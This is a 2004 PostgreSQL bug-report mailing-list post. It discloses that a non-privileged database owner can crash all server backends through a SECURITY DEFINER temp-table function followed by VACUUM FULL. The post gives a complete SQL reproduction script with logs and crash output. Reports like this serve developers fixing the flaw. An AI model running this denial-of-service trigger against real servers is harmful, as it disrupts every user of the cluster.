Denial of service via VACUUM, all backends exit and restart... - Mailing list pgsql-bugs
From | Sean Chittenden |
---|---|
Subject | Denial of service via VACUUM, all backends exit and restart... |
Date | |
Msg-id | 966E81D4-15D5-11D9-AD00-000A95C705DC@speakeasy.net Whole thread Raw |
Responses |
Re: Denial of service via VACUUM, all backends exit and restart...
|
List | pgsql-bugs |
There exists a crash that could easily be used as a denial of service against PostgreSQL by any user who can call a trusted stored procedure that makes use of temp tables. This DoS does not exist without the use of a stored procedure (from what I can tell). The gist of it being: CREATE DATABASE mydb WITH OWNER somedba; \c mydb somedba BEGIN; -- Call a stored procedure that runs as SECURITY DEFINER, which creates a temp table -- Add one or more rows of data to the table COMMIT; VACUUM FULL ANALYZE; Where somedba is the owner of the mydb database, but does not have any abnormal privs (is just a user who happens to be a database owner). When somedba runs VACUUM FULL ANALYZE, I get the following error during the VACUUM which panics the entire cluster and causes all backends to shutdown: dba@mydb: [local] 22325 2004-10-03 10:51:15 PDT ERROR: relcache reference tmptbl is not owned by resource owner @: 21502 2004-10-03 10:51:20 PDT LOG: server process (PID 22325) was terminated by signal 10 @: 21502 2004-10-03 10:51:20 PDT LOG: terminating any other active server processes @: 21502 2004-10-03 10:51:20 PDT LOG: all server processes terminated; reinitializing @: 22328 2004-10-03 10:51:21 PDT LOG: database system was interrupted at 2004-10-03 10:50:03 PDT @: 22328 2004-10-03 10:51:21 PDT LOG: checkpoint record is at 0/4C42FC8 @: 22328 2004-10-03 10:51:21 PDT LOG: redo record is at 0/4C42FC8; undo record is at 0/0; shutdown FALSE @: 22328 2004-10-03 10:51:21 PDT LOG: next transaction ID: 14034; next OID: 32678 @: 22328 2004-10-03 10:51:21 PDT LOG: database system was not properly shut down; automatic recovery in progress @: 22328 2004-10-03 10:51:21 PDT LOG: redo starts at 0/4C43008 @: 22328 2004-10-03 10:51:21 PDT WARNING: could not remove database directory "/usr/local/pgsql/data/base/30827" @: 22328 2004-10-03 10:51:24 PDT LOG: record with zero length at 0/57AA09C @: 22328 2004-10-03 10:51:24 PDT LOG: redo done at 0/57AA070 @: 22328 2004-10-03 10:51:24 PDT LOG: database system is ready I think this could be related to the bug I sent in a few days ago regarding new databases not having the owner properly set when creating a new database (ie, public is still owned by the owner of the template database, same with information_schema, etc). Regardless, here's an SQL script that reproduces this fatal condition: \c template1 realdba DROP DATABASE testdb; CREATE USER testdba ENCRYPTED PASSWORD 'pass' NOCREATEDB NOCREATEUSER; CREATE DATABASE testdb WITH OWNER testdba; \c testdb realdba ALTER SCHEMA public OWNER TO testdba; \c testdb testdba CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c; CREATE TRUSTED LANGUAGE plpgsql HANDLER plpgsql_call_handler; REVOKE ALL PRIVILEGES ON DATABASE testdb FROM PUBLIC CASCADE; GRANT CREATE,TEMPORARY ON DATABASE testdb TO testdba; REVOKE ALL PRIVILEGES ON SCHEMA public FROM PUBLIC CASCADE; GRANT USAGE ON SCHEMA public TO PUBLIC; BEGIN; CREATE FUNCTION public.tmptbl_foo() RETURNS VOID AS 'BEGIN PERFORM TRUE FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relname = \'tmptbl\'::TEXT AND c.relkind = \'r\'::TEXT AND pg_catalog.pg_table_is_visible(c.oid); IF NOT FOUND THEN EXECUTE \'CREATE LOCAL TEMP TABLE tmptbl (key TEXT) WITHOUT OIDS ON COMMIT DELETE ROWS;\'; ELSE TRUNCATE TABLE tmptbl; END IF; RETURN; END;' LANGUAGE 'plpgsql' SECURITY DEFINER; GRANT EXECUTE ON FUNCTION public.tmptbl_foo() TO PUBLIC; SELECT public.tmptbl_foo(); -- There has to be data in the TEMP TABLE otherwise the backend does not crash INSERT INTO tmptbl VALUES ('goozfraba'); COMMIT; VACUUM FULL ANALYZE; The output: You are now connected to database "template1" as user "realdba". DROP DATABASE CREATE USER CREATE DATABASE You are now connected to database "testdb" as user "realdba". ALTER SCHEMA You are now connected to database "testdb" as user "testdba". CREATE FUNCTION CREATE LANGUAGE REVOKE GRANT REVOKE GRANT BEGIN CREATE FUNCTION GRANT tmptbl_foo ------------ (1 row) COMMIT psql:test.sql:36: server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request. psql:test.sql:36: connection to server was lost Exit 2 And what a user sees on a different window: % psql somedb somedb=> BEGIN ; somedb=> INSERT INTO t1 (id) VALUES (1); somedb=> SELECT * from t1; id | i ----+--- 1 | (1 row) -- Run the SQL script from above somedb=> SELECT * from t1; WARNING: terminating connection because of crash of another server process DETAIL: The postmaster has commanded this server process to roll back the current transaction and exit, because another server process exited abnormally and possibly corrupted shared memory. HINT: In a moment you should be able to reconnect to the database and repeat your command. server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request. The connection to the server was lost. Attempting reset: Succeeded. somedb=> SELECT * from t1; id | i ----+--- (0 rows) Happy happy joy joy. :-( I ran this test a dozen times, and periodically I'd get the following error message: psql:test.sql:36: ERROR: relcache reference pg_toast_81859 is not owned by resource owner instead of the crash, which leads me to believe that this could be related to bgwriter as it seems to be execution time dependent and bgwriter is the only component that I know of that could alter the ordering of events via its calls to msleep(). I'm also of the belief that pg_autovacuum seems to help mitigate this if I'm running this script right as pg_autovacuum. If I split the above VACUUM commands into two different VACUUM's: VACUUM; VACUUM FULL; I get varying results: COMMIT psql:test.sql:36: ERROR: relcache reference tmptbl is not owned by resource owner TopTransaction ANALYZE psql:test.sql:37: ERROR: relcache reference pg_toast_122795 is not owned by resource owner TopTransaction or sometimes: psql:test.sql:36: ERROR: "pg_toast_122805" is not an index psql:test.sql:37: ERROR: "pg_toast_122805" is not an index or: psql:test.sql:36: ERROR: could not open relation with OID 245679 psql:test.sql:37: ERROR: could not open relation with OID 245679 or: psql:test.sql:36: ERROR: relcache reference pg_toast_204715 is not owned by resource owner TopTransaction psql:test.sql:37: ERROR: relcache reference tmptbl is not owned by resource owner and sometimes: psql:test.sql:36: ERROR: relcache reference pg_class is not owned by resource owner TopTransaction server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request. psql:test.sql:37: connection to server was lost If I change things around so it's ANALYZE; VACUUM;, I can prod out a different error message: ANALYZE psql:test.sql:36: WARNING: you don't own a lock of type RowExclusiveLock VACUUM psql:test.sql:37: ERROR: relcache reference tmptbl is not owned by resource owner TopTransaction and sometimes I just get: psql:test.sql:36: WARNING: you don't own a lock of type AccessShareLock VACUUM VACUUM Both of them I can't get when doing VACUUMs alone. :-( That last error message is spooky because I don't know if the backend is in a stable state or not.... given the other error messages, I'm spooked. :-/ So, with the wide range of error messages that come from the same script, I'm wondering if some memory isn't being trampled on, or the new subtransaction code and VACUUM/ANALYZE don't get along, or it's bgwriter somehow. *big shrug* Regardless, I thought this would be of keen interest to many: hopefully a fix can be found before 8.0 is released. -sc PS I haven't tested to see if this bug exists in pre-8.X releases. PPS Sorry for the barrage of bugs, I've been working offline for a few days now... now driving and found a hot spot along 101. /me gives 3 cheers for unprotected access points!!! -- Sean Chittenden
pgsql-bugs by date: